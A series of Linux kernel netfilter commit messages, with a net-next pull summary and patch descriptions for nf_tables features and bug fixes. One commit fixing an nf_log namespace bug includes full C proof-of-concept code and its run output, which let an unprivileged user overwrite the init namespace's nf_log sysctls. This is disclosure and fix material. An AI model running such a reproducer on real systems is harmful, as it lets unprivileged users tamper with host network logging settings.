Pablo Neira Ayuso says:
====================
Netfilter updates for net-next
The following patchset contains Netfilter updates for your net-next
tree. This includes better integration with the routing subsystem for
nf_tables, explicit notrack support and smaller updates. More
specifically, they are:
1) Add fib lookup expression for nf_tables, from Florian Westphal. This
new expression provides a native replacement for iptables addrtype
and rp_filter matches. This is more flexible though, since we can
populate the kernel flowi representation to inquire fib to
accomodate new usecases, such as RTBH through skb mark.
2) Introduce rt expression for nf_tables, from Anders K. Pedersen. This
new expression allow you to access skbuff route metadata, more
specifically nexthop and classid fields.
3) Add notrack support for nf_tables, to skip conntracking, requested by
many users already.
4) Add boilerplate code to allow to use nf_log infrastructure from
nf_tables ingress.
5) Allow to mangle pkttype from nf_tables prerouting chain, to emulate
the xtables cluster match, from Liping Zhang.
6) Move socket lookup code into generic nf_socket_* infrastructure so
we can provide a native replacement for the xtables socket match.
7) Make sure nfnetlink_queue data that is updated on every packets is
placed in a different cache from read-only data, from Florian Westphal.
8) Handle NF_STOLEN from nf_tables core, also from Florian Westphal.
9) Start round robin number generation in nft_numgen from zero,
instead of n-1, for consistency with xtables statistics match,
patch from Liping Zhang.
10) Set GFP_NOWARN flag in skbuff netlink allocations in nfnetlink_log,
given we retry with a smaller allocation on failure, from Calvin Owens.
11) Cleanup xt_multiport to use switch(), from Gao feng.
12) Remove superfluous check in nft_immediate and nft_cmp, from
Liping Zhang.
====================
Signed-off-by: David S. Miller <davem@davemloft.net>
As the comment indicates, the data at the end of nfqnl_instance struct is
written on every queue/dequeue, so it should reside in its own cacheline.
Before this change, 'lock' was in first cacheline so we dirtied both.
Signed-off-by: Florian Westphal <fw@strlen.de>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
After call nft_data_init, size is already validated and desc.len will
not exceed the sizeof(struct nft_data), i.e. 16 bytes. So it will never
exceed U8_MAX.
Furthermore, in nft_immediate_init, we forget to call nft_data_uninit
when desc.len exceeds U8_MAX, although this will not happen, but it's
a logical mistake.
Now remove these redundant validation introduced by commit 36b701fae1
("netfilter: nf_tables: validate maximum value of u32 netlink attributes")
Signed-off-by: Liping Zhang <zlpnobody@gmail.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
Introduces an nftables rt expression for routing related data with support
for nexthop (i.e. the directly connected IP address that an outgoing packet
is sent to), which can be used either for matching or accounting, eg.
# nft add rule filter postrouting \
ip daddr 192.168.1.0/24 rt nexthop != 192.168.0.1 drop
This will drop any traffic to 192.168.1.0/24 that is not routed via
192.168.0.1.
# nft add rule filter postrouting \
flow table acct { rt nexthop timeout 600s counter }
# nft add rule ip6 filter postrouting \
flow table acct { rt nexthop timeout 600s counter }
These rules count outgoing traffic per nexthop. Note that the timeout
releases an entry if no traffic is seen for this nexthop within 10 minutes.
# nft add rule inet filter postrouting \
ether type ip \
flow table acct { rt nexthop timeout 600s counter }
# nft add rule inet filter postrouting \
ether type ip6 \
flow table acct { rt nexthop timeout 600s counter }
Same as above, but via the inet family, where the ether type must be
specified explicitly.
"rt classid" is also implemented identical to "meta rtclassid", since it
is more logical to have this match in the routing expression going forward.
Signed-off-by: Anders K. Pedersen <akp@cohaesio.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
Move layer 2 packet logging into nf_log_l2packet() that resides in
nf_log_common.c, so this can be shared by both bridge and netdev
families.
This patch adds the boiler plate code to register the netdev logging
family.
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
Add FIB expression, supported for ipv4, ipv6 and inet family (the latter
just dispatches to ipv4 or ipv6 one based on nfproto).
Currently supports fetching output interface index/name and the
rtm_type associated with an address.
This can be used for adding path filtering. rtm_type is useful
to e.g. enforce a strong-end host model where packets
are only accepted if daddr is configured on the interface the
packet arrived on.
The fib expression is a native nftables alternative to the
xtables addrtype and rp_filter matches.
FIB result order for oif/oifname retrieval is as follows:
- if packet is local (skb has rtable, RTF_LOCAL set, this
will also catch looped-back multicast packets), set oif to
the loopback interface.
- if fib lookup returns an error, or result points to local,
store zero result. This means '--local' option of -m rpfilter
is not supported. It is possible to use 'fib type local' or add
explicit saddr/daddr matching rules to create exceptions if this
is really needed.
- store result in the destination register.
In case of multiple routes, search set for desired oif in case
strict matching is requested.
ipv4 and ipv6 behave fib expressions are supposed to behave the same.
[ I have collapsed Arnd Bergmann's ("netfilter: nf_tables: fib warnings")
http://patchwork.ozlabs.org/patch/688615/
to address fallout from this patch after rebasing nf-next, that was
posted to address compilation warnings. --pablo ]
Signed-off-by: Florian Westphal <fw@strlen.de>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
Mostly simple overlapping changes.
For example, David Ahern's adjacency list revamp in 'net-next'
conflicted with an adjacency list traversal bug fix in 'net'.
Signed-off-by: David S. Miller <davem@davemloft.net>
Now genl_register_family() is the only thing (other than the
users themselves, perhaps, but I didn't find any doing that)
writing to the family struct.
In all families that I found, genl_register_family() is only
called from __init functions (some indirectly, in which case
I've add __init annotations to clarifly things), so all can
actually be marked __ro_after_init.
This protects the data structure from accidental corruption.
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Instead of providing macros/inline functions to initialize
the families, make all users initialize them statically and
get rid of the macros.
This reduces the kernel code size by about 1.6k on x86-64
(with allyesconfig).
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Static family IDs have never really been used, the only
use case was the workaround I introduced for those users
that assumed their family ID was also their multicast
group ID.
Additionally, because static family IDs would never be
reserved by the generic netlink code, using a relatively
low ID would only work for built-in families that can be
registered immediately after generic netlink is started,
which is basically only the control family (apart from
the workaround code, which I also had to add code for so
it would reserve those IDs)
Thus, anything other than GENL_ID_GENERATE is flawed and
luckily not used except in the cases I mentioned. Move
those workarounds into a few lines of code, and then get
rid of GENL_ID_GENERATE entirely, making it more robust.
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
This patch adds notrack support.
I decided to add a new expression, given that this doesn't fit into the
existing set operation. Notrack doesn't need a source register, and an
hypothetical NFT_CT_NOTRACK key makes no sense since matching the
untracked state is done through NFT_CT_STATE.
I'm placing this new notrack expression into nft_ct.c, I think a single
module is too much.
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
After supporting this, we can combine it with hash expression to emulate
the 'cluster match'.
Suggested-by: Pablo Neira Ayuso <pablo@netfilter.org>
Signed-off-by: Liping Zhang <liping.zhang@spreadtrum.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
Currently we start round robin from 1, but it's better to start round
robin from 0. This is to keep consistent with xt_statistic in iptables.
Signed-off-by: Liping Zhang <liping.zhang@spreadtrum.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
Currently not supported, we'd oops as skb was (or is) free'd elsewhere.
Signed-off-by: Florian Westphal <fw@strlen.de>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
Since the code explicilty falls back to a smaller allocation when the
large one fails, we shouldn't complain when that happens.
Signed-off-by: Calvin Owens <calvinowens@fb.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
There are multiple equality condition checks in the original codes, so it
is better to use switch case instead of them.
Signed-off-by: Gao Feng <fgao@ikuai8.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
nf_queue handling is broken since e3b37f11e6 ("netfilter: replace
list_head with single linked list") for two reasons:
1) If the bypass flag is set on, there are no userspace listeners and
we still have more hook entries to iterate over, then jump to the
next hook. Otherwise accept the packet. On nf_reinject() path, the
okfn() needs to be invoked.
2) We should not re-enter the same hook on packet reinjection. If the
packet is accepted, we have to skip the current hook from where the
packet was enqueued, otherwise the packets gets enqueued over and
over again.
This restores the previous list_for_each_entry_continue() behaviour
happening from nf_iterate() that was dealing with these two cases.
This patch introduces a new nf_queue() wrapper function so this fix
becomes simpler.
Fixes: e3b37f11e6 ("netfilter: replace list_head with single linked list")
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
When the maximum evictions number is reached, do not wait 5 seconds before
the next run.
CC: Florian Westphal <fw@strlen.de>
Signed-off-by: Nicolas Dichtel <nicolas.dichtel@6wind.com>
Acked-by: Florian Westphal <fw@strlen.de>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
Markus Trippelsdorf reports:
WARNING: kmemcheck: Caught 64-bit read from uninitialized memory (ffff88001e605480)
4055601e0088ffff000000000000000090686d81ffffffff0000000000000000
u u u u u u u u u u u u u u u u i i i i i i i i u u u u u u u u
^
|RIP: 0010:[<ffffffff8166e561>] [<ffffffff8166e561>] nf_register_net_hook+0x51/0x160
[..]
[<ffffffff8166e561>] nf_register_net_hook+0x51/0x160
[<ffffffff8166eaaf>] nf_register_net_hooks+0x3f/0xa0
[<ffffffff816d6715>] ipt_register_table+0xe5/0x110
[..]
This warning is harmless; we copy 'uninitialized' data from the hook ops
but it will not be used.
Long term the structures keeping run-time data should be disentangled
from those only containing config-time data (such as where in the list
to insert a hook), but thats -next material.
Reported-by: Markus Trippelsdorf <markus@trippelsdorf.de>
Suggested-by: Al Viro <viro@ZenIV.linux.org.uk>
Signed-off-by: Florian Westphal <fw@strlen.de>
Acked-by: Aaron Conole <aconole@bytheb.org>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
The newly added nft_range_eval() function handles the two possible
nft range operations, but as the compiler warning points out,
any unexpected value would lead to the 'mismatch' variable being
used without being initialized:
net/netfilter/nft_range.c: In function 'nft_range_eval':
net/netfilter/nft_range.c:45:5: error: 'mismatch' may be used uninitialized in this function [-Werror=maybe-uninitialized]
This removes the variable in question and instead moves the
condition into the switch itself, which is potentially more
efficient than adding a bogus 'default' clause as in my
first approach, and is nicer than using the 'uninitialized_var'
macro.
Fixes: 0f3cd9b369 ("netfilter: nf_tables: add range expression")
Link: http://patchwork.ozlabs.org/patch/677114/
Signed-off-by: Arnd Bergmann <arnd@arndb.de>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
Use nft_parse_u32_check() to make sure we don't get a value over the
unsigned 8-bit integer. Moreover, make sure this value doesn't go over
the two supported range comparison modes.
Fixes: 9286c2eb1fda ("netfilter: nft_range: validate operation netlink attribute")
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
"err" needs to be signed for the error handling to work.
Fixes: 36b701fae1 ('netfilter: nf_tables: validate maximum value of u32 netlink attributes')
Signed-off-by: Dan Carpenter <dan.carpenter@oracle.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
We don't want to allow negatives here.
Fixes: 36b701fae1 ('netfilter: nf_tables: validate maximum value of u32 netlink attributes')
Signed-off-by: Dan Carpenter <dan.carpenter@oracle.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
Missing the nla_policy description will also miss the validation check
in kernel.
Fixes: 70ca767ea1 ("netfilter: nft_hash: Add hash offset value")
Signed-off-by: Liping Zhang <liping.zhang@spreadtrum.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
Otherwise, user cannot add related rules if xt_ipcomp.ko is not loaded:
# iptables -A OUTPUT -p 108 -m ipcomp --ipcompspi 1
iptables: No chain/target/match by that name.
Signed-off-by: Liping Zhang <liping.zhang@spreadtrum.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
Justin and Chris spotted that iptables NFLOG target was broken when they
upgraded the kernel to 4.8: "ulogd-2.0.5- IPs are no longer logged" or
"results in segfaults in ulogd-2.0.5".
Because "struct nf_loginfo li;" is a local variable, and flags will be
filled with garbage value, not inited to zero. So if it contains 0x1,
packets will not be logged to the userspace anymore.
Fixes: 7643507fe8 ("netfilter: xt_NFLOG: nflog-range does not truncate packets")
Reported-by: Justin Piszcz <jpiszcz@lucidpixels.com>
Reported-by: Chris Caputo <ccaputo@alt.net>
Tested-by: Chris Caputo <ccaputo@alt.net>
Signed-off-by: Liping Zhang <liping.zhang@spreadtrum.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
With HZ=100 element timeout in dynamic sets (i.e. flow tables) is 10 times
higher than configured.
Add proper conversion to/from jiffies, when interacting with userspace.
I tested this on Linux 4.8.1, and it applies cleanly to current nf and
nf-next trees.
Fixes: 22fe54d5fe ("netfilter: nf_tables: add support for dynamic set updates")
Signed-off-by: Anders K. Pedersen <akp@cohaesio.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
On 32-bit (e.g. with m68k-linux-gnu-gcc-4.1):
net/netfilter/xt_hashlimit.c: In function ‘user2credits’:
net/netfilter/xt_hashlimit.c:476: warning: integer constant is too large for ‘long’ type
...
net/netfilter/xt_hashlimit.c:478: warning: integer constant is too large for ‘long’ type
...
net/netfilter/xt_hashlimit.c:480: warning: integer constant is too large for ‘long’ type
...
net/netfilter/xt_hashlimit.c: In function ‘rateinfo_recalc’:
net/netfilter/xt_hashlimit.c:513: warning: integer constant is too large for ‘long’ type
Fixes: 11d5f15723 ("netfilter: xt_hashlimit: Create revision 2 to support higher pps rates")
Signed-off-by: Geert Uytterhoeven <geert@linux-m68k.org>
Acked-by: Vishwanath Pai <vpai@akamai.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
Use the correct pattern for singly linked list insertion and
deletion. We can also calculate the list head outside of the
mutex.
Fixes: e3b37f11e6 ("netfilter: replace list_head with single linked list")
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Reviewed-by: Aaron Conole <aconole@bytheb.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
net/netfilter/core.c | 108 ++++++++++++++++-----------------------------------
1 file changed, 33 insertions(+), 75 deletions(-)
nf_log_proc_dostring() used current's network namespace instead of the one
corresponding to the sysctl file the write was performed on. Because the
permission check happens at open time and the nf_log files in namespaces
are accessible for the namespace owner, this can be abused by an
unprivileged user to effectively write to the init namespace's nf_log
sysctls.
Stash the "struct net *" in extra2 - data and extra1 are already used.
Repro code:
#define _GNU_SOURCE
#include <stdlib.h>
#include <sched.h>
#include <err.h>
#include <sys/mount.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>
char child_stack[1000000];
uid_t outer_uid;
gid_t outer_gid;
int stolen_fd = -1;
void writefile(char *path, char *buf) {
int fd = open(path, O_WRONLY);
if (fd == -1)
err(1, "unable to open thing");
if (write(fd, buf, strlen(buf)) != strlen(buf))
err(1, "unable to write thing");
close(fd);
}
int child_fn(void *p_) {
if (mount("proc", "/proc", "proc", MS_NOSUID|MS_NODEV|MS_NOEXEC,
NULL))
err(1, "mount");
/* Yes, we need to set the maps for the net sysctls to recognize us
* as namespace root.
*/
char buf[1000];
sprintf(buf, "0 %d 1\n", (int)outer_uid);
writefile("/proc/1/uid_map", buf);
writefile("/proc/1/setgroups", "deny");
sprintf(buf, "0 %d 1\n", (int)outer_gid);
writefile("/proc/1/gid_map", buf);
stolen_fd = open("/proc/sys/net/netfilter/nf_log/2", O_WRONLY);
if (stolen_fd == -1)
err(1, "open nf_log");
return 0;
}
int main(void) {
outer_uid = getuid();
outer_gid = getgid();
int child = clone(child_fn, child_stack + sizeof(child_stack),
CLONE_FILES|CLONE_NEWNET|CLONE_NEWNS|CLONE_NEWPID
|CLONE_NEWUSER|CLONE_VM|SIGCHLD, NULL);
if (child == -1)
err(1, "clone");
int status;
if (wait(&status) != child)
err(1, "wait");
if (!WIFEXITED(status) || WEXITSTATUS(status) != 0)
errx(1, "child exit status bad");
char *data = "NONE";
if (write(stolen_fd, data, strlen(data)) != strlen(data))
err(1, "write");
return 0;
}
Repro:
$ gcc -Wall -o attack attack.c -std=gnu99
$ cat /proc/sys/net/netfilter/nf_log/2
nf_log_ipv4
$ ./attack
$ cat /proc/sys/net/netfilter/nf_log/2
NONE
Because this looks like an issue with very low severity, I'm sending it to
the public list directly.
Signed-off-by: Jann Horn <jann@thejh.net>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
Division of 64bit integers will cause linker error undefined reference
to `__udivdi3'. Fix this by replacing divisions with div64_64
Fixes: 11d5f15723 ("netfilter: xt_hashlimit: Create revision 2 to ...")
Signed-off-by: Vishwanath Pai <vpai@akamai.com>
Acked-by: Maciej Żenczykowski <maze@google.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
When CONFIG_NETFILTER_INGRESS is unset (or no), we need to handle
the request for registration properly by dropping the hook. This
releases the entry during the set.
Fixes: e3b37f11e6 ("netfilter: replace list_head with single linked list")
Signed-off-by: Aaron Conole <aconole@bytheb.org>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
It's possible for nf_hook_entry_head to return NULL. If two
nf_unregister_net_hook calls happen simultaneously with a single hook
entry in the list, both will enter the nf_hook_mutex critical section.
The first will successfully delete the head, but the second will see
this NULL pointer and attempt to dereference.
This fix ensures that no null pointer dereference could occur when such
a condition happens.
Fixes: e3b37f11e6 ("netfilter: replace list_head with single linked list")
Signed-off-by: Aaron Conole <aconole@bytheb.org>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
Conflicts:
net/netfilter/core.c
net/netfilter/nf_tables_netdev.c
Resolve two conflicts before pull request for David's net-next tree:
1) Between c73c248490 ("netfilter: nf_tables_netdev: remove redundant
ip_hdr assignment") from the net tree and commit ddc8b6027a
("netfilter: introduce nft_set_pktinfo_{ipv4, ipv6}_validate()").
2) Between e8bffe0cf9 ("net: Add _nf_(un)register_hooks symbols") and
Aaron Conole's patches to replace list_head with single linked list.
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
nf_log is used by both nftables and iptables, so use XT_LOG_XXX macros
here is not appropriate. Replace them with NF_LOG_XXX.
Signed-off-by: Liping Zhang <liping.zhang@spreadtrum.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
NFTA_LOG_FLAGS attribute is already supported, but the related
NF_LOG_XXX flags are not exposed to the userspace. So we cannot
explicitly enable log flags to log uid, tcp sequence, ip options
and so on, i.e. such rule "nft add rule filter output log uid"
is not supported yet.
So move NF_LOG_XXX macro definitions to the uapi/../nf_log.h. In
order to keep consistent with other modules, change NF_LOG_MASK to
refer to all supported log flags. On the other hand, add a new
NF_LOG_DEFAULT_MASK to refer to the original default log flags.
Finally, if user specify the unsupported log flags or NFTA_LOG_GROUP
and NFTA_LOG_FLAGS are set at the same time, report EINVAL to the
userspace.
Signed-off-by: Liping Zhang <liping.zhang@spreadtrum.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
Inverse ranges != [a,b] are not currently possible because rules are
composites of && operations, and we need to express this:
data < a || data > b
This patch adds a new range expression. Positive ranges can be already
through two cmp expressions:
cmp(sreg, data, >=)
cmp(sreg, data, <=)
This new range expression provides an alternative way to express this.
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
Fabian reports a possible conntrack memory leak (could not reproduce so
far), however, one minor issue can be easily resolved:
> cat /proc/net/nf_conntrack | wc -l = 5
> 4 minutes required to clean up the table.
We should not report those timed-out entries to the user in first place.
And instead of just skipping those timed-out entries while iterating over
the table we can also zap them (we already do this during ctnetlink
walks, but I forgot about the /proc interface).
Fixes: f330a7fdbe ("netfilter: conntrack: get rid of conntrack timer")
Reported-by: Fabian Frederick <fabf@skynet.be>
Signed-off-by: Florian Westphal <fw@strlen.de>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
Create a new revision for the hashlimit iptables extension module. Rev 2
will support higher pps of upto 1 million, Version 1 supports only 10k.
To support this we have to increase the size of the variables avg and
burst in hashlimit_cfg to 64-bit. Create two new structs hashlimit_cfg2
and xt_hashlimit_mtinfo2 and also create newer versions of all the
functions for match, checkentry and destroy.
Some of the functions like hashlimit_mt, hashlimit_mt_check etc are very
similar in both rev1 and rev2 with only minor changes, so I have split
those functions and moved all the common code to a *_common function.
Signed-off-by: Vishwanath Pai <vpai@akamai.com>
Signed-off-by: Joshua Hunt <johunt@akamai.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
I am planning to add a revision 2 for the hashlimit xtables module to
support higher packets per second rates. This patch renames all the
functions and variables related to revision 1 by adding _v1 at the
end of the names.
Signed-off-by: Vishwanath Pai <vpai@akamai.com>
Signed-off-by: Joshua Hunt <johunt@akamai.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
NFT_CT_MARK is unrelated to direction, so if NFTA_CT_DIRECTION attr is
specified, report EINVAL to the userspace. This validation check was
already done at nft_ct_get_init, but we missed it in nft_ct_set_init.
Signed-off-by: Liping Zhang <liping.zhang@spreadtrum.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
Currently, if the user want to match ct l3proto, we must specify the
direction, for example:
# nft add rule filter input ct original l3proto ipv4
^^^^^^^^
Otherwise, error message will be reported:
# nft add rule filter input ct l3proto ipv4
nft add rule filter input ct l3proto ipv4
<cmdline>:1:1-38: Error: Could not process rule: Invalid argument
add rule filter input ct l3proto ipv4
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Actually, there's no need to require NFTA_CT_DIRECTION attr, because
ct l3proto and protocol are unrelated to direction.
And for compatibility, even if the user specify the NFTA_CT_DIRECTION
attr, do not report error, just skip it.
Signed-off-by: Liping Zhang <liping.zhang@spreadtrum.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
It is valid that the TCP RST packet which does not set ack flag, and bytes
of ack number are zero. But current seqadj codes would adjust the "0" ack
to invalid ack number. Actually seqadj need to check the ack flag before
adjust it for these RST packets.
The following is my test case
client is 10.26.98.245, and add one iptable rule:
iptables -I INPUT -p tcp --sport 12345 -m connbytes --connbytes 2:
--connbytes-dir reply --connbytes-mode packets -j REJECT --reject-with
tcp-reset
This iptables rule could generate on TCP RST without ack flag.
server:10.172.135.55
Enable the synproxy with seqadjust by the following iptables rules
iptables -t raw -A PREROUTING -i eth0 -p tcp -d 10.172.135.55 --dport 12345
-m tcp --syn -j CT --notrack
iptables -A INPUT -i eth0 -p tcp -d 10.172.135.55 --dport 12345 -m conntrack
--ctstate INVALID,UNTRACKED -j SYNPROXY --sack-perm --timestamp --wscale 7
--mss 1460
iptables -A OUTPUT -o eth0 -p tcp -s 10.172.135.55 --sport 12345 -m conntrack
--ctstate INVALID,UNTRACKED -m tcp --tcp-flags SYN,RST,ACK SYN,ACK -j ACCEPT
The following is my test result.
1. packet trace on client
root@routers:/tmp# tcpdump -i eth0 tcp port 12345 -n
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes
IP 10.26.98.245.45154 > 10.172.135.55.12345: Flags [S], seq 3695959829,
win 29200, options [mss 1460,sackOK,TS val 452367884 ecr 0,nop,wscale 7],
length 0
IP 10.172.135.55.12345 > 10.26.98.245.45154: Flags [S.], seq 546723266,
ack 3695959830, win 0, options [mss 1460,sackOK,TS val 15643479 ecr 452367884,
nop,wscale 7], length 0
IP 10.26.98.245.45154 > 10.172.135.55.12345: Flags [.], ack 1, win 229,
options [nop,nop,TS val 452367885 ecr 15643479], length 0
IP 10.172.135.55.12345 > 10.26.98.245.45154: Flags [.], ack 1, win 226,
options [nop,nop,TS val 15643479 ecr 452367885], length 0
IP 10.26.98.245.45154 > 10.172.135.55.12345: Flags [R], seq 3695959830,
win 0, length 0
2. seqadj log on server
[62873.867319] Adjusting sequence number from 602341895->546723267,
ack from 3695959830->3695959830
[62873.867644] Adjusting sequence number from 602341895->546723267,
ack from 3695959830->3695959830
[62873.869040] Adjusting sequence number from 3695959830->3695959830,
ack from 0->55618628
To summarize, it is clear that the seqadj codes adjust the 0 ack when receive
one TCP RST packet without ack.
Signed-off-by: Gao Feng <fgao@ikuai8.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
The netfilter hook list never uses the prev pointer, and so can be trimmed to
be a simple singly-linked list.
In addition to having a more light weight structure for hook traversal,
struct net becomes 5568 bytes (down from 6400) and struct net_device becomes
2176 bytes (down from 2240).
Signed-off-by: Aaron Conole <aconole@bytheb.org>
Signed-off-by: Florian Westphal <fw@strlen.de>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
This commit adds an upfront check for sane values to be passed when
registering a netfilter hook. This will be used in a future patch for a
simplified hook list traversal.
Signed-off-by: Aaron Conole <aconole@bytheb.org>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
All of the callers of nf_hook_slow already hold the rcu_read_lock, so this
cleanup removes the recursive call. This is just a cleanup, as the locking
code gracefully handles this situation.
Signed-off-by: Aaron Conole <aconole@bytheb.org>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
The origin codes perform two condition checks with dst_mtu(skb_dst(skb))
and in_mtu. And the last statement is "min(dst_mtu(skb_dst(skb)),
in_mtu) - minlen". It may let reader think about how about the result.
Would it be negative.
Now assign the result of min(dst_mtu(skb_dst(skb)), in_mtu) to a new
variable, then only perform one condition check, and it is more readable.
Signed-off-by: Gao Feng <fgao@ikuai8.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>